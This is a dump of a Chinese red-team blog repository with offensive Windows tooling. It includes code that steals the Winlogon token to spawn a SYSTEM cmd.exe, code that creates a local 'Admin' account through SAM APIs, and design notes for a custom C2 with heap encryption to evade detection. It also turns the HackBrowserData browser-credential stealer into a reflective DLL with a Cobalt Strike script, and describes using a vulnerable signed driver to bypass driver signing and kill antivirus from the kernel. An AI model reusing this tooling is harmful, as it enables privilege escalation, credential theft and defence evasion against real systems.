 91 | 	BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hCurrentToken);
 92 | 	SePrivTokenrivilege(hCurrentToken, L"SeDebugPrivilege", TRUE);
 93 | 
 94 | 	DWORD PID_TO_IMPERSONATE = FindProcessPID(L"Winlogon.exe");
 95 | 	HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, true, PID_TO_IMPERSONATE);
 96 | 
 97 | 
 98 | 	HANDLE hToken = NULL;
 99 | 	BOOL TokenRet = OpenProcessToken(hProcess,
100 | 		TOKEN_DUPLICATE |
101 | 		TOKEN_ASSIGN_PRIMARY |
102 | 		TOKEN_QUERY, &hToken);
103 | 
104 | 	BOOL impersonateUser = ImpersonateLoggedOnUser(hToken);
105 | 	if (GetLastError() == NULL)
106 | 	{
107 | 		RevertToSelf();
108 | 	}
109 | 
110 | 	
111 | 	BOOL dpToken = DuplicateTokenEx(hToken, 
112 | 		TOKEN_ADJUST_DEFAULT |
113 | 		TOKEN_ADJUST_SESSIONID |
114 | 		TOKEN_QUERY |
115 | 		TOKEN_DUPLICATE |
116 | 		TOKEN_ASSIGN_PRIMARY,
117 | 		NULL,
118 | 		SecurityImpersonation,
119 | 		TokenPrimary,
120 | 		&hDpToken
121 | 	);
122 | 
123 | 
124 | 	STARTUPINFO startupInfo = {0};
125 | 	startupInfo.cb = sizeof(STARTUPINFO);
126 | 	PROCESS_INFORMATION ProcessInfo = {0};
127 | 
128 | 	BOOL Ret = CreateProcessWithTokenW(hDpToken,
129 | 		LOGON_WITH_PROFILE,
130 | 		L"C:\\Windows\\System32\\cmd.exe",
131 | 		NULL, 0, NULL, NULL,
132 | 		&startupInfo,
133 | 		&ProcessInfo);
134 | 
135 | 
136 | 	return TRUE;
137 | }
138 | ```
139 | 
140 | ## LINKS
141 | 
142 | {% embed url="https://docs.microsoft.com/zh-cn/azure/active-directory/develop/access-tokens" %}
143 | 
144 | 
145 | 
146 | 


--------------------------------------------------------------------------------
/redteam-research/netuseradd-ni-xiang.md:
--------------------------------------------------------------------------------
  1 | # NetUserAdd逆向
  2 | 
  3 | ## 起因
  4 | 
  5 | ![](../.gitbook/assets/image%20%28266%29.png)
  6 | 
  7 | ## 过程
  8 | 
  9 | 反手直接拖ida。
 10 | 
 11 | ![](../.gitbook/assets/image%20%28273%29.png)
 12 | 
 13 | ![](../.gitbook/assets/image%20%28261%29.png)
 14 | 
 15 | 跟了下逻辑然后对比了下React OS发现逻辑几乎一致，那直接扣代码。
 16 | 
 17 | ![](../.gitbook/assets/image%20%28268%29.png)
 18 | 
 19 | win10上UaspOpenDomain没有导出，可以使用特征码搜索的方式去调用，这里跟进了发现同样是调用了sam系函数。
 20 | 
 21 | ![](../.gitbook/assets/image%20%28262%29.png)
 22 | 
 23 | 跟一下函数还需要sid。
 24 | 
 25 | ![](../.gitbook/assets/image%20%28260%29.png)
 26 | 
 27 | ![](../.gitbook/assets/image%20%28272%29.png)
 28 | 
 29 | 发现是由 LsaQueryInformationPolicy的获取，这个函数在ntsecapi.h里有描述，直接拿来用就好了。
 30 | 
 31 | 至此用户创建完成，然后通过SetUserInfo设置密码，同样这个函数在windows 10上没有导出。
 32 | 
 33 | ![](../.gitbook/assets/image%20%28265%29.png)
 34 | 
 35 | ![](../.gitbook/assets/image%20%28271%29.png)
 36 | 
 37 | 跟一下，发现下层函数一致并导出。
 38 | 
 39 | ![](../.gitbook/assets/image%20%28270%29.png)
 40 | 
 41 | ![](../.gitbook/assets/image%20%28263%29.png)
 42 | 
 43 | ![](../.gitbook/assets/image%20%28257%29.png)
 44 | 
 45 | 跟踪了一下函数逻辑，发现不同的UserInfo都有不同的处理方法，通常我们会传入一个USERINFO1结构体，这里会把有效信息传入到一个 USER\_ALL\_INFORMATION 结构体里面，这个结构体的实现和Startupinfo有点像，需要同时设置值和使用标签位，阅读发现，有一个结构体单处理密码。
 46 | 
 47 | ![](../.gitbook/assets/image%20%28274%29.png)
 48 | 
 49 | ![](../.gitbook/assets/image%20%28269%29.png)
 50 | 
 51 | 这里我们只需要传入密码，然后将标志位设1。
 52 | 
 53 | 我们就自己封装出了一个NetUserAdd。
 54 | 
 55 | ## 完整代码
 56 | 
 57 | ```text
 58 | #include "ApiAddUser.h"
 59 | 
 60 | 
 61 | 
 62 | int wmain(int argc, wchar_t* argv[])
 63 | {
 64 | 	UNICODE_STRING UserName;
 65 | 	UNICODE_STRING PassWord;
 66 | 	HANDLE ServerHandle = NULL;
 67 | 	HANDLE DomainHandle = NULL;
 68 | 	HANDLE UserHandle = NULL;
 69 | 	ULONG GrantedAccess;
 70 | 	ULONG RelativeId;
 71 | 	NTSTATUS Status = NULL;
 72 | 	HMODULE hSamlib = NULL;
 73 | 	HMODULE hNtdll = NULL;
 74 | 	HMODULE hNetapi32 = NULL;
 75 | 	LSA_HANDLE hPolicy = NULL;
 76 | 	LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
 77 | 	PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL;
 78 | 	USER_ALL_INFORMATION uai = { 0 };
 79 | 
 80 | 
 81 | 	hSamlib = LoadLibraryA("samlib.dll");
 82 | 	hNtdll = LoadLibraryA("ntdll");
 83 | 
 84 | 	pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect");
 85 | 	pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain");
 86 | 	pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain");
 87 | 	pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser");
 88 | 	pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject");
 89 | 	pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
 90 | 
 91 | 	RtlInitUnicodeString(&UserName, L"Admin");
 92 | 	RtlInitUnicodeString(&PassWord, L"Admin");
 93 | 
 94 | 	Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);;
 95 | 	Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy);
 96 | 	Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo);
 97 | 
 98 | 	Status = SamOpenDomain(ServerHandle, 
 99 | 		DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS, 
100 | 		DomainInfo->DomainSid, 
101 | 		&DomainHandle);
102 | 
103 | 	Status = SamCreateUser2InDomain(DomainHandle,
104 | 		&UserName,
105 | 		USER_NORMAL_ACCOUNT,
106 | 		USER_ALL_ACCESS | DELETE | WRITE_DAC,
107 | 		&UserHandle,&GrantedAccess,&RelativeId);
108 | 
109 | 	RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer);
110 | 	uai.NtPasswordPresent = TRUE;
111 | 	uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT;
112 | 
113 | 
114 | 	Status = SamSetInformationUser(UserHandle,
115 | 		UserAllInformation,
116 | 		&uai);
117 | 
118 | 	return 0;
119 | }
120 | ```
121 | 
122 | ## LINKS
123 | 
124 | {% embed url="https://doxygen.reactos.org/d2/d5b/dll\_2win32\_2netapi32\_2user\_8c.html\#a854f5ebc802849632ccda207250e7b04" %}
125 | 
126 | 
127 | 
128 | 


--------------------------------------------------------------------------------
/redteam-research/untitled.md:
--------------------------------------------------------------------------------
  1 | # NtQueryInformationProcess逆向
  2 | 
  3 | ## 起因
  4 | 
  5 | 早一段时间有一位朋友问过我如何跨进程获取全路径，当时回答的时候告诉他可以从PEB的LDR链表里和通过QueryFullProcessImageNameW获取，最近闲下来了去逆了一下这个函数，发现并非如此，所以记录一下。
  6 | 
  7 | ## 过程
  8 | 
  9 | 首先还是打开文档查一下公开信息，发现这个函数由kernel32导出，把kernel32拖进ida看一下反汇编。
 10 | 
 11 | ![](../.gitbook/assets/image%20%28254%29.png)
 12 | 
 13 | ![](../.gitbook/assets/image%20%28249%29.png)
 14 | 
 15 | ![](../.gitbook/assets/image%20%28255%29.png)
 16 | 
 17 | 发现实际上这个kernel32导出的这个函数是个转发函数，它由api-ms-win-core-psapi-l1-1-0.dll导出，有经验的朋友可能知道很多api-ms\*系dll在磁盘上根本找不到，找到它拖进ida，发现它只是个字符串。
 18 | 
 19 | ![](../.gitbook/assets/image%20%28253%29.png)
 20 | 
 21 | 实际上微软试图将api体系结构和具体的实现分开，但往往一个dll中包含了大量不同体系的实现\(如kernelbase\)，这样微软提出了一种名为\(virtual dlls\)的方案，通过虚拟dll建立一张映射表来转发到实现dll，这样就能把api体系与实现分开。
 22 | 
 23 | 具体细节可参考[https://blog.quarkslab.com/runtime-dll-name-resolution-apisetschema-part-i.html](https://blog.quarkslab.com/runtime-dll-name-resolution-apisetschema-part-i.html)
 24 | 
 25 | ![](../.gitbook/assets/image%20%28247%29.png)
 26 | 
 27 | 在转发到真实dll kernelbase.dll，同样拖进ida。
 28 | 
 29 | ![](../.gitbook/assets/image%20%28243%29.png)
 30 | 
 31 | 在简单逆向之后发现居然是通过NtQueryInformationProcess来实现的，传入的查询参数为flag\*16+27,
 32 | 
 33 | 根据微前面的参数检测，只有两个可传入值0或1，查看文档。
 34 | 
 35 | ![](../.gitbook/assets/image%20%28256%29.png)
 36 | 
 37 | ![](../.gitbook/assets/image%20%28246%29.png)
 38 | 
 39 | 分别对应了ring0和ring3不同的形式，那么根据逻辑传入的查询参数分别为27或43,我们写一个简单程序验证一下。
 40 | 
 41 | ```text
 42 | #include <windows.h>
 43 | #include <stdio.h>
 44 | #include <winternl.h>
 45 | 
 46 | #pragma comment(lib,"ntdll.lib")
 47 | int main()
 48 | {
 49 | 
 50 |     UNICODE_STRING usRing0 = {0};
 51 |     UNICODE_STRING usRing3 = { 0 };
 52 | 
 53 |     NtQueryInformationProcess(GetCurrentProcess(),(PROCESSINFOCLASS)27,&usRing0, 0x1000, NULL);
 54 |     NtQueryInformationProcess(GetCurrentProcess(), (PROCESSINFOCLASS)43, &usRing3, 0x1000, NULL);
 55 | 
 56 |     getchar();
 57 | }
 58 | 
 59 | ```
 60 | 
 61 | ![](../.gitbook/assets/image%20%28244%29.png)
 62 | 
 63 | ## 取巧
 64 | 
 65 | 当然也有取巧的办法，我们需要请出我们的windbg,查看一下是否记录了这个枚举结构。
 66 | 
 67 | ```text
 68 | 0:004> dt *!*Process*Information*Class*
 69 | DBGHELP: C:\Users\Black Sheep\source\repos\NtQueryInformationProcess1\x64\Debug\NtQueryInformationProcess1.pdb is a partial PDB and can't enumerate symbol information.
 70 |           ole32!PROCESS_INFORMATION_CLASS
 71 |           ole32!_PROCESS_INFORMATION_CLASS
 72 |           combase!PROCESS_INFORMATION_CLASS
 73 |           combase!_PROCESS_INFORMATION_CLASS
 74 | 0:004> dt ole32!PROCESS_INFORMATION_CLASS
 75 |    ProcessMemoryPriority = 0n0
 76 |    ProcessMemoryExhaustionInfo = 0n1
 77 |    ProcessAppMemoryInfo = 0n2
 78 |    ProcessInPrivateInfo = 0n3
 79 |    ProcessPowerThrottling = 0n4
 80 |    ProcessReservedValue1 = 0n5
 81 |    ProcessTelemetryCoverageInfo = 0n6
 82 |    ProcessProtectionLevelInfo = 0n7
 83 |    ProcessLeapSecondInfo = 0n8
 84 |    ProcessInformationClassMax = 0n9
 85 | ```
 86 | 
 87 | 很遗憾它没有完全记录这个枚举类型，这时候我想到了ReactOS，尝试去看一下是否在老NT内核就有这个选项，之所以用ReactOS而不是泄露的windows源码是因为ReactOS有维护着的文档，交叉查询起来比较方便。
 88 | 
 89 | ![](../.gitbook/assets/image%20%28251%29.png)
 90 | 
 91 | ![](../.gitbook/assets/image%20%28245%29.png)
 92 | 
 93 | 很幸运，它记录了比较全的枚举结构类型，我们也能比较方便的查看查询返回的结构体，搜索一下引用。
 94 | 
 95 | ![](../.gitbook/assets/image%20%28248%29.png)
 96 | 
 97 | ![](../.gitbook/assets/image%20%28252%29.png)
 98 | 
 99 | ## Links
100 | 
101 | {% embed url="https://blog.quarkslab.com/runtime-dll-name-resolution-apisetschema-part-i.html" %}
102 | 
103 | 
104 | 
105 | 


--------------------------------------------------------------------------------
/weapon-design/c2-manuscript/README.md:
--------------------------------------------------------------------------------
 1 | # C2手稿
 2 | 
 3 | ## 简介
 4 | 
 5 | C2是个啥玩意我就不赘述了,放一些设计初期的手稿,希望能对大家有所帮助。
 6 | 
 7 | ## 第一章 设计理念
 8 | 
 9 | ### 1.设计模型
10 | 
11 | 该C2采用Client-Teamserver-Agent设计,其中Agent为汇编、C实现,而Teamserver与Client使用C\#实现。
12 | 
13 | Agent部分以RDI技术为核心扩展,采用Fork&Run思想设计,即傀儡进程注入RDI反射DLL,这样做的好处在于Agent从设计上规避了这块使用内存的回收问题，同时提高了RDI模块本身的容错,但这样设计同样存在不小的缺陷,从OPSEC的角度来说,这种设计不是特别合适,所以我们同时还要提供一种相对于Fork&Run更难以检测的模式,作者选用Master-Worker模式,Worker以抢占式的执行Master分配的任务。
14 | 
15 | TeamServer与Client均为C\#编写,出于对使用者的体验考虑,故设计成与CS\(Cobaltstrike下文若非特指均称为CS\),Client与Teamserver之间采用ASP.NET的WEB Api进行数据交互,与Agent之间使用自建WEB Server或Raw Socket进行交互,数据格式参考cobaltstrike,将Channel\(信道,即数据的传输方式\)与Metadata\(元数据,即Agent的操作指令\)解耦合,即信道与元数据分离,同时在数据传输过程中使用RSA+AES的强加密\(在信道中实现\)。
16 | 
17 | 具体细节会在后续章节正文中讲解。
18 | 
19 | ### 2.概念图
20 | 
21 | #### 2.1 Agent
22 | 
23 | ![](../../.gitbook/assets/image-20210615113856114.png)
24 | 
25 | ![](../../.gitbook/assets/image-20210615113817201.png)
26 | 
27 | #### 2.2 TeamServcer
28 | 
29 | ![](../../.gitbook/assets/image-20210615113754347.png)
30 | 
31 | 


--------------------------------------------------------------------------------
/weapon-design/c2-manuscript/heap-jia-mi.md:
--------------------------------------------------------------------------------
 1 | # Heap加密
 2 | 
 3 | ## 简介
 4 | 
 5 | 最近堆\(Heap\)加密给BeaconEye整挺火,刚好自己也在写C2,就简单记录下。
 6 | 
 7 | ## 流程
 8 | 
 9 | 1. 遍历进程拥有的堆。
10 | 2. 编译堆中已分配的块。
11 | 3. 异或已分配块中的数据。
12 | 
13 | ## 过程
14 | 
15 | 首先用GetProcessHeaps获取进程拥有的所有堆句柄。
16 | 
17 | ```text
18 | DWORD GetProcessHeaps(
19 |   DWORD   NumberOfHeaps,
20 |   PHANDLE ProcessHeaps
21 | );
22 | ```
23 | 
24 | 然后用HeapWalk枚举所有已分配的堆内存块。\(这个函数设计的挺好的终于不用啥First Next了 略略略\)
25 | 
26 | （heapEntry.wFlags & PROCESS\_HEAP\_ENTRY\_BUSY\)
27 | 
28 | ```text
29 | BOOL HeapWalk(
30 |   HANDLE               hHeap,
31 |   LPPROCESS_HEAP_ENTRY lpEntry
32 | );
33 | ```
34 | 
35 | ![](../../.gitbook/assets/image%20%28289%29.png)
36 | 
37 | ![](../../.gitbook/assets/image%20%28288%29.png)
38 | 
39 | ## 代码
40 | 
41 | ```text
42 | #include <windows.h>
43 | #include <stdio.h>
44 | 
45 | 
46 | VOID Xor(char* buffer, size_t buffer_size) {
47 | 	char key[9] = { 1,2,3,4,5,6,8,0 };
48 | 
49 | 	for (size_t i = 0; i < buffer_size; i++)
50 | 	{
51 | 		buffer[i] ^= key[i % sizeof(key)-1];
52 | 	}
53 | }
54 | 
55 | VOID FuckHeap() {
56 | 	PROCESS_HEAP_ENTRY heapEntry = { 0 };
57 | 	HANDLE hHeap = GetProcessHeap();
58 | 	while (HeapWalk(hHeap, &heapEntry))
59 | 	{
60 | 		if (heapEntry.wFlags & PROCESS_HEAP_ENTRY_BUSY)
61 | 		{
62 | 			Xor((char*)heapEntry.lpData, heapEntry.cbData);
63 | 		}
64 | 	}
65 | }
66 | 
67 | int main()
68 | {
69 | 	
70 | 	LPVOID WorkPath = malloc(MAX_PATH);
71 | 	GetCurrentDirectoryA(MAX_PATH, (LPSTR)WorkPath);
72 | 	printf("%s\n", (char*)WorkPath);
73 | 	FuckHeap();
74 | 
75 | 	//printf("%s\n", (char*)WorkPath);
76 | 	FuckHeap();
77 | 	printf("%s\n", (char*)WorkPath);
78 | 
79 | }
80 | ```
81 | 
82 | 
83 | 
84 | ## Links
85 | 
86 | [https://www.arashparsa.com/hook-heaps-and-live-free/](https://www.arashparsa.com/hook-heaps-and-live-free/)
87 | 
88 | 


--------------------------------------------------------------------------------
/weapon-design/c2-manuscript/real-uml.md:
--------------------------------------------------------------------------------
1 | # 实现UML图
2 | 
3 | 
4 | 
5 | ![](../../.gitbook/assets/image%20%28287%29.png)
6 | 
7 | 


--------------------------------------------------------------------------------
/weapon-design/c2-manuscript/shu-ju-da-bao-fang-shi.md:
--------------------------------------------------------------------------------
 1 | # 数据打包DataPacker
 2 | 
 3 | 如果是定长数据就直接压入buffer,不是定长数据压入一个长度再压入数据。
 4 | 
 5 | ![](../../.gitbook/assets/image%20%28290%29.png)
 6 | 
 7 | ```text
 8 | using System;
 9 | using System.Collections.Generic;
10 | using System.Linq;
11 | using System.Text;
12 | using System.Threading.Tasks;
13 | 
14 | namespace xxx.Core
15 | {
16 |     class DataPacker
17 |     {
18 |         byte[] buffer = new byte[] { };
19 |         int size = 0;
20 |         public DataPacker(byte[] data)
21 |         {
22 |             size = BitConverter.ToInt32(data[..3]);
23 |             buffer = data[4..];
24 |         }
25 |         public DataPacker()
26 |         {
27 |         }
28 |         public byte[] sub(int start,int end)
29 |         {
30 |             return buffer[start..end];
31 |         }
32 |         public void push(int data)
33 |         {
34 |             var dataBytes = BitConverter.GetBytes(data);
35 |             buffer = Utils.Combine(buffer, dataBytes);
36 |         }
37 |         public void push(short data)
38 |         {
39 |             var dataBytes = BitConverter.GetBytes(data);
40 |             buffer = Utils.Combine(buffer, dataBytes);
41 |         }
42 |         public void push(string data)
43 |         {
44 |             var sizeBytes = BitConverter.GetBytes(data.Length + 1);
45 |             var dataBytes = Encoding.ASCII.GetBytes(data);
46 |             buffer = Utils.Combine(buffer, sizeBytes, dataBytes, new byte[] { 0x00 });
47 |         }
48 |         public void push(byte data)
49 |         {
50 |             buffer = Utils.Combine(buffer, new byte[] { data});
51 |         }
52 | 
53 |         public void push(byte[] data)
54 |         {
55 |             var dataBytes = BitConverter.GetBytes(data.Length);
56 |             buffer = Utils.Combine(buffer, dataBytes, data);
57 |         }
58 |         public byte[] GetBuffer()
59 |         {
60 |             var dataBytes = BitConverter.GetBytes(buffer.Length+4);
61 |             return (byte[])Utils.Combine(dataBytes, buffer).Clone();
62 |         }
63 | 
64 |     }
65 | }
66 | 
67 | ```
68 | 
69 | 


--------------------------------------------------------------------------------
/weapon-design/idoknow.md:
--------------------------------------------------------------------------------
1 | # 我也不知道能不能写
2 | 
3 | 


--------------------------------------------------------------------------------
/weapon-design/xian-zhan-ge-wei-zhi.md:
--------------------------------------------------------------------------------
1 | # 先占个位置
2 | 
3 | 


--------------------------------------------------------------------------------
/weaponization/go-xiang-mu-fan-she-gai-zao.md:
--------------------------------------------------------------------------------
  1 | # Go项目反射改造
  2 | 
  3 | ## 简介
  4 | 
  5 | 反射加载也没什么好说的，突然一时兴起想试一下能不能搞出来go的反射模块，发现已经有师傅铺好了路，这里手动@[WBGlIl](https://github.com/WBGlIl)师傅，选了用[HackBrowserData](https://github.com/moonD4rk/HackBrowserData)项目。
  6 | 
  7 | ## 过程
  8 | 
  9 | 首先修改一些默认选项，删除一些字符串，指定输出格式json，开启压缩存储。
 10 | 
 11 | ![](../.gitbook/assets/image%20%28277%29.png)
 12 | 
 13 | 复制一个main函数命名为run，导出它。
 14 | 
 15 | ![&#x6CE8;&#x610F;&#x4E0A;&#x9762;&#x7684;&#x6CE8;&#x91CA;&#x662F;&#x53C2;&#x4E0E;&#x7F16;&#x8BD1;&#x7684;&#xFF0C;&#x58F0;&#x660E;&#x5BFC;&#x51FA;&#x3002;](../.gitbook/assets/image%20%28284%29.png)
 16 | 
 17 | 添加如下文件。
 18 | 
 19 | ```text
 20 | //dllmain.def
 21 | 
 22 | EXPORTS
 23 |     run
 24 |     ReflectiveLoader
 25 | 
 26 | //dllmain.c
 27 | #include "dllmain.h"
 28 | #include <Windows.h>
 29 | #include <stdio.h>
 30 | #define DLL_QUERY_HMODULE 6
 31 | extern HINSTANCE hAppInstance;
 32 | BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) {
 33 | 	BOOL bReturnValue = TRUE;
 34 | 	switch( dwReason ) {
 35 | 		case DLL_QUERY_HMODULE:
 36 | 			if( lpReserved != NULL )
 37 | 				*(HMODULE *)lpReserved = hAppInstance;
 38 | 			break;
 39 | 		case DLL_PROCESS_ATTACH:
 40 | 			hAppInstance = hinstDLL;
 41 | 			run();
 42 | 			fflush(stdout);
 43 | 			ExitProcess(0);
 44 | 			break;
 45 | 		case DLL_PROCESS_DETACH:
 46 | 		case DLL_THREAD_ATTACH:
 47 | 		case DLL_THREAD_DETACH:
 48 | 			break;
 49 | 	}
 50 | 	return bReturnValue;
 51 | }
 52 | 
 53 | //dllmain.go
 54 | package main
 55 | 
 56 | //#include "dllmain.h"
 57 | //#include "ReflectiveLoader.h"
 58 | import "C"
 59 | 
 60 | //ReflectiveLoader.h
 61 | 这玩意就省略了...
 62 | ```
 63 | 
 64 | 然后使用如下bat编译。
 65 | 
 66 | ```text
 67 | //x64
 68 | del dllmain.a
 69 | set GOARCH=amd64
 70 | go build -a -v --gcflags=-trimpath=$GOPATH -asmflags=-trimpath=$GOPATH -ldflags "-w -s" -buildmode=c-archive -o dllmain.a
 71 | gcc dllmain.def dllmain.a -shared -lwinmm -lWs2_32 -o dllmain.dll
 72 | move dllmain.dll reflective_dll.x64.dll
 73 | //x32
 74 | set GOARCH=386
 75 | set CGO_ENABLED=0
 76 | set path=E:\mingw32\bin\;%path%
 77 | go build --ldflags "-s -w" -buildmode=c-archive -o dllmain.a
 78 | gcc dllmain.def dllmain.a -shared -lwinmm -lWs2_32 -o dllmain.dll
 79 | move dllmain.dll reflective_dll.dll 
 80 | 
 81 | ```
 82 | 
 83 | 然后改造下这个项目，让他不落地回传数据，这部分代码就不贴了。
 84 | 
 85 | ![](../.gitbook/assets/image%20%28281%29.png)
 86 | 
 87 | ## 效果
 88 | 
 89 | 都先patch一下。
 90 | 
 91 | ![](../.gitbook/assets/image%20%28282%29.png)
 92 | 
 93 | 都能跑起来。
 94 | 
 95 | ![](../.gitbook/assets/image%20%28278%29.png)
 96 | 
 97 | 编写cna脚本。
 98 | 
 99 | ```text
100 | alias hackDataBrowers {
101 | 	local('$dll');
102 | 	btask($1, "Task Beacon to run HackDataBrowers", "T9999");
103 | 	if (-is64 $1) {
104 | 		$dll    = getFileProper(script_resource("resources"), "reflective_dll.x64.dll");
105 | 	}
106 | 	else {
107 | 		$dll    = getFileProper(script_resource("resources"), "reflective_dll.dll");
108 | 	}
109 | 	bdllspawn($1, $dll , $2, "Get Browers Data", 5000, false);
110 | 
111 | }
112 | ```
113 | 
114 | ### 遗留问题
115 | 
116 | 这玩意体积太大了，cs的反射函数直接罢工。。。。。
117 | 
118 | ## LINKS
119 | 
120 | {% embed url="https://github.com/WBGlIl" %}
121 | 
122 | 
123 | 
124 | 


--------------------------------------------------------------------------------
/weaponization/vulnbins-de-li-yong-vuln-driver.md:
--------------------------------------------------------------------------------
 1 | # VulnBins的利用 \(vuln driver\)
 2 | 
 3 | ## 简介
 4 | 
 5 | 挺久没水博客了，今个简单写点，现在的杀软越来越"现代化"了，老是尝试免杀已有木马使我疲惫，干脆想种一劳永逸的解决办法，\(自写C2 狗头\),当然这是个体力活，这篇文件简单介绍下白漏洞驱动带起黑驱动，直接从内核干掉杀软。
 6 | 
 7 | ## 流程
 8 | 
 9 | 1. 找一个存在任意文件读取的漏洞驱动
10 | 2. 加载驱动并漏洞利用修改内核DES位\(作用于驱动签名校验\)
11 | 3. 加载黑驱动
12 | 4. 漏洞利用改回原值
13 | 5. 卸载白驱动
14 | 
15 | ### 代码片段
16 | 
17 | ### 鲨进程 驱动片段
18 | 
19 | 获取当前进程EPROCESS,遍历ActiveProcessLinks获取和判断进程,符合条件就给扬了,当然最好用点强杀手段。
20 | 
21 | ```text
22 | BOOLEAN KillProcess(ULONG PID)
23 | {
24 | 	NTSTATUS ntStatus = STATUS_SUCCESS;
25 | 	PVOID hProcess;
26 | 	PEPROCESS pEprcess;
27 | 	ntStatus = PsLookupProcessByProcessId(PID, &pEprcess);
28 | 
29 | 	if (NT_SUCCESS(ntStatus))
30 | 	{
31 | 		if (ObOpenObjectByPointer((PVOID)pEprcess, 0, NULL, 0, NULL, KernelMode, &hProcess) != STATUS_SUCCESS)
32 | 			{
33 | 			return FALSE;
34 | 			}
35 | 		ZwTerminateProcess((HANDLE)hProcess, STATUS_SUCCESS);
36 | 		ZwClose((HANDLE)hProcess);
37 | 		return TRUE;
38 | 	}
39 | };
40 | 
41 | ```
42 | 
43 | ### Loader
44 | 
45 | ```text
46 | 
47 | ```
48 | 
49 | 
50 | 
51 | 


--------------------------------------------------------------------------------